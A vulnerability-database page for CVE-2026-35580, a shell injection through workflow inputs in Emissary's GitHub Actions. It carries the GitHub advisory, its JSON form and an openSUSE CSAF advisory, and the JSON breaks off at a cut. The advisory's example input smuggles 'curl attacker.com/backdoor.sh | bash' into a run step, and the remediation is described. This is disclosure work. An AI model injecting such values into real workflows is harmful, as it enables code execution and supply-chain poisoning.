Vulnerability-Lookup

CVE-2026-35580 (GCVE-0-2026-35580)

Vulnerability from cvelistv5 – Published: 2026-04-07 15:55 – Updated: 2026-04-07 18:25

Title

Emissary has GitHub Actions Shell Injection via Workflow Inputs

Summary

Emissary is a P2P based data-driven workflow engine. Prior to 8.39.0, GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users. This vulnerability is fixed in 8.39.0.

Severity ?

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	NationalSecurityAgency	emissary	Affected: < 8.39.0

GHSA-3G6G-GQ4R-XJM9

Vulnerability from github – Published: 2026-04-08 00:12 – Updated: 2026-04-08 00:12

Summary

Emissary has GitHub Actions Shell Injection via Workflow Inputs

Details

Summary

Three GitHub Actions workflow files contained 10 shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users.

Affected Files

Workflow file	Injection points
`.github/workflows/maven-version.yml`	4
`.github/workflows/cherrypick.yml`	5
`.github/workflows/maven-release.yml`	1

Details

GitHub Actions ${{ }} expressions inside run: blocks are substituted before the shell interprets the command. When a workflow_dispatch input is placed directly in a run: block, an attacker who can trigger the workflow can break out of the intended command and execute arbitrary code.

Example — `maven-version.yml` (before fix)

- name: Set the name of the branch
  run: echo "PR_BRANCH=action/${{ github.event.inputs.next_version }}" >> "$GITHUB_ENV"

A malicious input such as 1.0.0"; curl attacker.com/backdoor.sh | bash; echo " would be interpolated directly into the shell, executing arbitrary commands with the job's GITHUB_TOKEN permissions (contents: write, pull-requests: write).

Impact

Arbitrary code execution within the CI/CD runner
Repository modification via the contents: write token (push malicious commits)
Supply chain poisoning — downstream users who clone or build receive compromised code
Credential exfiltration from the GitHub Actions environment

Remediation

Fixed in two PRs merged into release 8.39.0:

PR #1286 — Environment variable indirection

Replaced all direct ${{ inputs.* }} interpolation in run: blocks with environment variable indirection. Inputs are assigned to env: at the step level, then referenced as shell variables inside run:.

# After (safe — input is never interpreted by the shell parser)
- name: Set the name of the branch
  run: echo "PR_BRANCH=action/$IN_NEXT_VERSION" >> "$GITHUB_ENV"
  env:
    IN_NEXT_VERSION: ${{ github.event.inputs.next_version }}

PR #1288 — Input validation

Added strict regex validation steps that run before any input is used:

maven-version.yml: Validates next_version matches ^[a-zA-Z0-9._-]+$
maven-release.yml: Validates release_suffix matches ^[a-zA-Z0-9._-]+$
cherrypick.yml: Validates commits matches ^([0-9a-f]{7,40})(\s+[0-9a-f]{7,40})*$

All jobs now also use shell: bash via defaults.run.shell to ensure consistent shell behavior.

Workarounds

There is no workaround other than upgrading. Organizations that have forked Emissary should apply the same environment variable indirection and input validation patterns to their workflow files.

References

PR #1286 — environment variable indirection
PR #1288 — input validation
GitHub Security Lab: Keeping your GitHub Actions and workflows secure
Original report: GHSA-wjqm-p579-x3ww

Severity ?

9.1 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "gov.nsa.emissary:emissary"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.39.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35580"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T00:12:42Z",
    "nvd_published_at": "2026-04-07T17:16:33Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThree GitHub Actions workflow files contained **10 shell injection points** where\nuser-controlled `workflow_dispatch` inputs were interpolated directly into shell\ncommands via `${{ }}` expression syntax. An attacker with repository write access\ncould inject arbitrary shell commands, leading to repository poisoning and supply\nchain compromise affecting all downstream users.\n\n## Affected Files\n\n| Workflow file                            | Injection points |\n|------------------------------------------|------------------|\n| `.github/workflows/maven-version.yml`    | 4                |\n| `.github/workflows/cherrypick.yml`       | 5                |\n| `.github/workflows/maven-release.yml`    | 1                |\n\n## Details\n\nGitHub Actions `${{ }}` expressions inside `run:` blocks are substituted **before**\nthe shell interprets the command. When a `workflow_dispatch` input is placed directly\nin a `run:` block, an attacker who can trigger the workflow can break out of the\nintended command and execute arbitrary code.\n\n### Example \u2014 `maven-version.yml` (before fix)\n\n```yaml\n- name: Set the name of the branch\n  run: echo \"PR_BRANCH=action/${{ github.event.inputs.next_version }}\" \u003e\u003e \"$GITHUB_ENV\"\n```\n\nA malicious input such as `1.0.0\"; curl attacker.com/backdoor.sh | bash; echo \"`\nwould be interpolated directly into the shell, executing arbitrary commands with\nthe job\u0027s `GITHUB_TOKEN` permissions (`contents: write`, `pull-requests: write`).\n\n### Impact\n\n- Arbitrary code execution within the CI/CD runner\n- Repository modification via the `contents: write` token (push malicious commits)\n- Supply chain poisoning \u2014 downstream users who clone or build receive compromised code\n- Credential exfiltration from the GitHub Actions environment\n\n## Remediation\n\nFixed in two PRs merged into release 8.39.0:\n\n### PR #1286 \u2014 Environment variable indirection\n\nReplaced all direct `${{ inputs.* }}` interpolation in `run:` blocks with\nenvironment variable indirection. Inputs are assigned to `env:` at the step level,\nthen referenced as shell variables inside `run:`.\n\n```yaml\n# After (safe \u2014 input is never interpreted by the shell parser)\n- name: Set the name of the branch\n  run: echo \"PR_BRANCH=action/$IN_NEXT_VERSION\" \u003e\u003e \"$GITHUB_ENV\"\n  env:\n    IN_NEXT_VERSION: ${{ github.event.inputs.next_version }}\n```\n\n### PR #1288 \u2014 Input validation\n\nAdded strict regex validation steps that run before any input is used:\n\n- `maven-version.yml`: Validates `next_version` matches `^[a-zA-Z0-9._-]+$`\n- `maven-release.yml`: Validates `release_suffix` matches `^[a-zA-Z0-9._-]+$`\n- `cherrypick.yml`: Validates `commits` matches `^([0-9a-f]{7,40})(\\s+[0-9a-f]{7,40})*$`\n\nAll jobs now also use `shell: bash` via `defaults.run.shell` to ensure consistent\nshell behavior.\n\n## Workarounds\n\nThere is no workaround other than upgrading. Organizations that have forked\nEmissary should apply the same environment variable indirection and input\nvalidation patterns to their workflow files.\n\n## References\n\n- [PR #1286 \u2014 environment variable indirection](https://github.com/NationalSecurityAgency/emissary/pull/1286)\n- [PR #1288 \u2014 input validation](https://github.com/NationalSecurityAgency/emissary/pull/1288)\n- [GitHub Security Lab: Keeping your GitHub Actions and workflows secure](https://securitylab.github.com/resources/github-actions-untrusted-input/)\n- Original report: GHSA-wjqm-p579-x3ww",
  "id": "GHSA-3g6g-gq4r-xjm9",
  "modified": "2026-04-08T00:12:42Z",
  "published": "2026-04-08T00:12:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35580"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NationalSecurityAgency/emissary/pull/1286"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NationalSecurityAgency/emissary/pull/1288"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/NationalSecurityAgency/emissary"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Emissary has GitHub Actions Shell Injection via Workflow Inputs"
}

OPENSUSE-SU-2026:10540-1

Vulnerability from csaf_opensuse - Published: 2026-04-14 00:00 - Updated: 2026-04-14 00:00

Summary

Botan-3.11.1-1.1 on GA media

Severity

Moderate

Notes

Title of the patch: Botan-3.11.1-1.1 on GA media

Description of the patch: These are all security issues fixed in the Botan-3.11.1-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames: openSUSE-Tumbleweed-2026-10540

CVE-2026-35580

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

CVE-2026-35582

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

References

URL

Category

	https://www.suse.com/support/security/rating/	external
	https://ftp.suse.com/pub/projects/security/csaf/o…	self
	https://www.suse.com/security/cve/CVE-2026-35580/	self
	https://www.suse.com/security/cve/CVE-2026-35582/	self
	https://www.suse.com/security/cve/CVE-2026-35580	external
	https://www.suse.com/security/cve/CVE-2026-35582	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Botan-3.11.1-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the Botan-3.11.1-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2026-10540",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10540-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-35580 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-35580/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-35582 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-35582/"
      }
    ],
    "title": "Botan-3.11.1-1.1 on GA media",
    "tracking": {
      "current_release_date": "2026-04-14T00:00:00Z",
      "generator": {
        "date": "2026-04-14T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2026:10540-1",
      "initial_release_date": "2026-04-14T00:00:00Z",
      "revision_history": [
        {
          "date": "2026-04-14T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "Botan-3.11.1-1.1.aarch64",
                "product": {
                  "name": "Botan-3.11.1-1.1.aarch64",
                  "product_id": "Botan-3.11.1-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "Botan-doc-3.11.1-1.1.aarch64",
                "product": {
                  "name": "Botan-doc-3.11.1-1.1.aarch64",
                  "product_id": "Botan-doc-3.11.1-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libbotan-3-11-3.11.1-1.1.aarch64",
                "product": {
                  "name": "libbotan-3-11-3.11.1-1.1.aarch64",
                  "product_id": "libbotan-3-11-3.11.1-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libbotan-devel-3.11.1-1.1.aarch64",
                "product": {
                  "name": "libbotan-devel-3.11.1-1.1.aarch64",
                  "product_id": "libbotan-devel-3.11.1-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python3-botan-3.11.1-1.1.aarch64",
                "product": {
                  "name": "python3-botan-3.11.1-1.1.aarch64",
                  "product_id": "python3-botan-3.11.1-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "Botan-3.11.1-1.1.ppc64le",
                "product": {
                  "name": "Botan-3.11.1-1.1.ppc64le",
                  "product_id": "Botan-3.11.1-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "Botan-doc-3.11.1-1.1.ppc64le",
                "product": {
                  "name": "Botan-doc-3.11.1-1.1.ppc64le",
                  "product_id": "Botan-doc-3.11.1-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libbotan-3-11-3.11.1-1.1.ppc64le",
                "product": {
                  "name": "libbotan-3-11-3.11.1-1.1.ppc64le",
                  "product_id": "libbotan-3-11-3.11.1-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libbotan-devel-3.11.1-1.1.ppc64le",
                "product": {
                  "name": "libbotan-devel-3.11.1-1.1.ppc64le",
                  "product_id": "libbotan-devel-3.11.1-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python3-botan-3.11.1-1.1.ppc64le",
                "product": {
                  "name": "python3-botan-3.11.1-1.1.ppc64le",
                  "product_id": "python3-botan-3.11.1-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "Botan-3.11.1-1.1.s390x",
                "product": {
                  "name": "Botan-3.11.1-1.1.s390x",
                  "product_id": "Botan-3.11.1-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "Botan-doc-3.11.1-1.1.s390x",
                "product": {
                  "name": "Botan-doc-3.11.1-1.1.s390x",
                  "product_id": "Botan-doc-3.11.1-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libbotan-3-11-3.11.1-1.1.s390x",
                "product": {
                  "name": "libbotan-3-11-3.11.1-1.1.s390x",
                  "product_id": "libbotan-3-11-3.11.1-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libbotan-devel-3.11.1-1.1.s390x",
                "product": {
                  "name": "libbotan-devel-3.11.1-1.1.s390x",
                  "product_id": "libbotan-devel-3.11.1-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python3-botan-3.11.1-1.1.s390x",
                "product": {
                  "name": "python3-botan-3.11.1-1.1.s390x",
                  "product_id": "python3-botan-3.11.1-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "Botan-3.11.1-1.1.x86_64",
                "product": {
                  "name": "Botan-3.11.1-1.1.x86_64",
                  "product_id": "Botan-3.11.1-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "Botan-doc-3.11.1-1.1.x86_64",
                "product": {
                  "name": "Botan-doc-3.11.1-1.1.x86_64",
                  "product_id": "Botan-doc-3.11.1-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libbotan-3-11-3.11.1-1.1.x86_64",
                "product": {
                  "name": "libbotan-3-11-3.11.1-1.1.x86_64",
                  "product_id": "libbotan-3-11-3.11.1-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libbotan-devel-3.11.1-1.1.x86_64",
                "product": {
                  "name": "libbotan-devel-3.11.1-1.1.x86_64",
                  "product_id": "libbotan-devel-3.11.1-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python3-botan-3.11.1-1.1.x86_64",
                "product": {
                  "name": "python3-botan-3.11.1-1.1.x86_64",
                  "product_id": "python3-botan-3.11.1-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "Botan-3.11.1-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:Botan-3.11.1-1.1.aarch64"
        },
        "product_reference": "Botan-3.11.1-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "Botan-3.11.1-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:Botan-3.11.1-1.1.ppc64le"
        },
        "product_reference": "Botan-3.11.1-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "Botan-3.11.1-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:Botan-3.11.1-1.1.s390x"
        },
        "product_reference": "Botan-3.11.1-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "Botan-3.11.1-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:Botan-3.11.1-1.1.x86_64"
        },
        "product_reference": "Botan-3.11.1-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "Botan-doc-3.11.1-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.aarch64"
        },
        "product_reference": "Botan-doc-3.11.1-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "Botan-doc-3.11.1-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.ppc64le"
        },
        "product_reference": "Botan-doc-3.11.1-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "Botan-doc-3.11.1-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.s390x"
        },
        "product_reference": "Botan-doc-3.11.1-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "Botan-doc-3.11.1-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.x86_64"
        },
        "product_reference": "Botan-doc-3.11.1-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libbotan-3-11-3.11.1-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.aarch64"
        },
        "product_reference": "libbotan-3-11-3.11.1-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libbotan-3-11-3.11.1-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.ppc64le"
        },
        "product_reference": "libbotan-3-11-3.11.1-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libbotan-3-11-3.11.1-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.s390x"
        },
        "product_reference": "libbotan-3-11-3.11.1-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libbotan-3-11-3.11.1-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.x86_64"
        },
        "product_reference": "libbotan-3-11-3.11.1-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libbotan-devel-3.11.1-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.aarch64"
        },
        "product_reference": "libbotan-devel-3.11.1-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libbotan-devel-3.11.1-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.ppc64le"
        },
        "product_reference": "libbotan-devel-3.11.1-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libbotan-devel-3.11.1-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.s390x"
        },
        "product_reference": "libbotan-devel-3.11.1-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libbotan-devel-3.11.1-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.x86_64"
        },
        "product_reference": "libbotan-devel-3.11.1-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-botan-3.11.1-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.aarch64"
        },
        "product_reference": "python3-botan-3.11.1-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-botan-3.11.1-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.ppc64le"
        },
        "product_reference": "python3-botan-3.11.1-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-botan-3.11.1-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.s390x"
        },
        "product_reference": "python3-botan-3.11.1-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-botan-3.11.1-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.x86_64"
        },
        "product_reference": "python3-botan-3.11.1-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-35580",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-35580"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Emissary is a P2P based data-driven workflow engine. Prior to 8.39.0, GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users. This vulnerability is fixed in 8.39.0.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:Botan-3.11.1-1.1.aarch64",
          "openSUSE Tumbleweed:Botan-3.11.1-1.1.ppc64le",
          "openSUSE Tumbleweed:Botan-3.11.1-1.1.s390x",
          "openSUSE Tumbleweed:Botan-3.11.1-1.1.x86_64",
          "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.aarch64",
          "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.ppc64le",
          "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.s390x",
          "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.x86_64",
          "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.aarch64",
          "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.ppc64le",
          "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.s390x",
          "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.x86_64",
          "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.aarch64",
          "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.ppc64le",
          "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.s390x",
          "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.x86_64",
          "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.aarch64",
          "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.ppc64le",
          "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.s390x",
          "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-35580",
          "url": "https://www.suse.com/security/cve/CVE-2026-35580"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:Botan-3.11.1-1.1.aarch64",
            "openSUSE Tumbleweed:Botan-3.11.1-1.1.ppc64le",
            "openSUSE Tumbleweed:Botan-3.11.1-1.1.s390x",
            "openSUSE Tumbleweed:Botan-3.11.1-1.1.x86_64",
            "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.aarch64",
            "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.ppc64le",
            "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.s390x",
            "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.x86_64",
            "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.aarch64",
            "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.ppc64le",
            "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.s390x",
            "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.x86_64",
            "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.aarch64",
            "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.ppc64le",
            "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.s390x",
            "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.x86_64",
            "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.aarch64",
            "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.s390x",
            "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-14T00:00:00Z",
          "details": "critical"
        }
      ],
      "title": "CVE-2026-35580"
    },
    {
      "cve": "CVE-2026-35582",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-35582"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "unknown",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:Botan-3.11.1-1.1.aarch64",
          "openSUSE Tumbleweed:Botan-3.11.1-1.1.ppc64le",
          "openSUSE Tumbleweed:Botan-3.11.1-1.1.s390x",
          "openSUSE Tumbleweed:Botan-3.11.1-1.1.x86_64",
          "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.aarch64",
          "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.ppc64le",
          "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.s390x",
          "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.x86_64",
          "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.aarch64",
          "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.ppc64le",
          "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.s390x",
          "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.x86_64",
          "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.aarch64",
          "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.ppc64le",
          "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.s390x",
          "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.x86_64",
          "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.aarch64",
          "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.ppc64le",
          "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.s390x",
          "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-35582",
          "url": "https://www.suse.com/security/cve/CVE-2026-35582"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:Botan-3.11.1-1.1.aarch64",
            "openSUSE Tumbleweed:Botan-3.11.1-1.1.ppc64le",
            "openSUSE Tumbleweed:Botan-3.11.1-1.1.s390x",
            "openSUSE Tumbleweed:Botan-3.11.1-1.1.x86_64",
